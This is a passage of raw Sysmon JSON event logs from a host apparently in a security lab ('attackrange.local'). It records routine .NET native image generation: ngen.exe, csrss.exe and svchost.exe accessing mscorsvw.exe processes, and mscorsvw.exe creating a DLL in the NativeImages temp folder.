05:58:52.668","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-049C-5F25-0000-001091770F00}","TargetProcessId":"3112","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7267,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:52.668\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-049C-5F25-0000-001091770F00}\r\nTargetProcessId: 3112\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:52.668","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-049C-5F25-0000-001091770F00}","TargetProcessId":"3112","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7268,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:52.668\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-049C-5F25-0000-001091770F00}\r\nTargetProcessId: 3112\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:52.668","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-049C-5F25-0000-001091770F00}","TargetProcessId":"3112","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7269,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:58:52.777\r\nProcessGuid: {A837DB8D-049C-5F25-0000-001091770F00}\r\nProcessId: 3112\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\c28-0\\SMDiagnostics.dll\r\nCreationUtcTime: 2020-08-01 05:58:52.777","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:58:52.777","ProcessGuid":"{A837DB8D-049C-5F25-0000-001091770F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\c28-0\\SMDiagnostics.dll","CreationUtcTime":"2020-08-01 05:58:52.777","EventReceivedTime":"2020-08-01 05:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7270,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:52.809\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-049C-5F25-0000-0010A97C0F00}\r\nTargetProcessId: 2372\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:52.809","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-049C-5F25-0000-0010A97C0F00}","TargetProcessId":"2372","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7271,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:52.809\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-049C-5F25-0000-0010A97C0F00}\r\nTargetProcessId: 2372\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:52.809","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-049C-5F25-0000-0010A97C0F00}","TargetProcessId":"2372","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7272,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:52.809\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-049C-5F25-0000-0010A97C0F00}\r\nTargetProcessId: 2372\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:52.809","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-049C-5F25-0000-0010A97C0F00}","TargetProcessId":"2372","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7273,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:52.855\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-049C-5F25-0000-001076800F00}\r\nTargetProcessId: 4452\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:52.855","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-049C-5F25-0000-001076800F00}","TargetProcessId":"4452","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7274,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:52.855\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-049C-5F25-0000-001076800F00}\r\nTargetProcessId: 4452\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:52.855","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-049C-5F25-0000-001076800F00}","TargetProcessId":"4452","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7275,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:52.855\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-049C-5F25-0000-001076800F00}\r\nTargetProcessId: 4452\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 